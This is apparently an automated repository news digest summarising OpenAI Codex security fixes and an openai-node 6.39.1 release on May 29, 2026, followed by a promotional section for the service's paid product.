RepoJournal
OpenAI

OpenAI

Codex, the SDKs, and the engine behind ChatGPT

Pick a date

  1. Sat 2 may
  2. Sun 3 may
  3. Mon 4 may
  4. Tue 5 may
  5. Wed 6 may
  6. Thu 7 may
  7. Fri 8 may
  8. Sat 9 may
  9. Sun 10 may
  10. Mon 11 may
  11. Tue 12 may
  12. Wed 13 may
  13. Thu 14 may
  14. Sat 16 may
  15. Sun 17 may
  16. Tue 19 may
  17. Wed 20 may
  18. Thu 21 may
  19. Sat 23 may
  20. Mon 25 may
  21. Tue 26 may
  22. Wed 27 may
  23. Thu 28 may
  24. Fri 29 may
  25. Sat 30 may
  26. Sun 31 may
  27. Mon 1 jun
  28. Mon 8 jun
  29. Tue 9 jun
  30. Today 10 jun

The Wire · Showcase

CODEX CLOSES THREE SECURITY GAPS WHILE NODE SDK STEADIES SHIPPING

By RepoJournal · Filed · About OpenAI

Codex patched a repository code execution vulnerability in /diff while tightening sandbox network denial handling, and the Node SDK shipped 6.39.1 to fix undici dispatcher mismatches.

Three critical fixes landed in Codex overnight, all closing attack surface. The most urgent: /diff now blocks repository-configured code execution helpers [1], closing a path where untrusted repos could run arbitrary scripts when users ran diagnostics. Separately, Windows sandbox execution now properly terminates when network denial hits [2] instead of lingering until timeout, eliminating a window where sandboxed code could persist after security policy rejection. Configuration vocabulary also standardized across the platform [3], replacing inconsistent "none" with "deny" for Unix socket permissions to match filesystem policy language. On the Node SDK side, openai-node 6.39.1 shipped with improved guidance for undici dispatcher mismatches [4] and fixed binary upload handling [4], addressing friction points for production integrations. The Codex team also reverted a benchmark crate that broke musl builders [5], keeping the build clean. Thread idle lifecycle wiring landed [6], moving idle state management out of goal-runtime-specific code into generic lifecycle hooks for better composition.

Action items

References

  1. [1] fix(tui): prevent repository-configured code execution in /diff (#24954) openai/codex
  2. [2] fix: cancel Windows sandbox on network denial (#19880) openai/codex
  3. [3] fix(config): use deny for Unix socket permissions (#24970) openai/codex
  4. [4] release: 6.39.1 ↗ openai/openai-node
  5. [5] Revert "Add app-server startup benchmark crate" ↗ openai/codex
  6. [6] Wire task completion into thread-idle lifecycle ↗ openai/codex

FAQ

What changed in OpenAI on May 29, 2026?
Codex patched a repository code execution vulnerability in /diff while tightening sandbox network denial handling, and the Node SDK shipped 6.39.1 to fix undici dispatcher mismatches.
What should OpenAI teams do about it?
Update openai-node to 6.39.1 immediately if using undici or binary uploads • Review any local /diff usage with untrusted repositories and re-run diagnostics • Verify Windows sandbox network policy enforcement in staging before next deploy
Which OpenAI repositories shipped on May 29, 2026?
openai/codex, openai/openai-node

Related across the cluster

For your repos

The showcase is a teaser.
Your wire is the product.

Same engine. Different stack. Below: what changes when the wire is yours.

Showcase wire

  • 14 famous open source orgs
  • One wire per day
  • Public, generic
  • Read on the web, when you remember

Your wire

  • Up to 1,500 of your repos - orgs, deps, vendors
  • Morning and evening briefs
  • Action items routed to your team
  • Slack delivery, email, breaking-news CVE alerts

Want a hands-on demo first? Ask a current user for an invite link.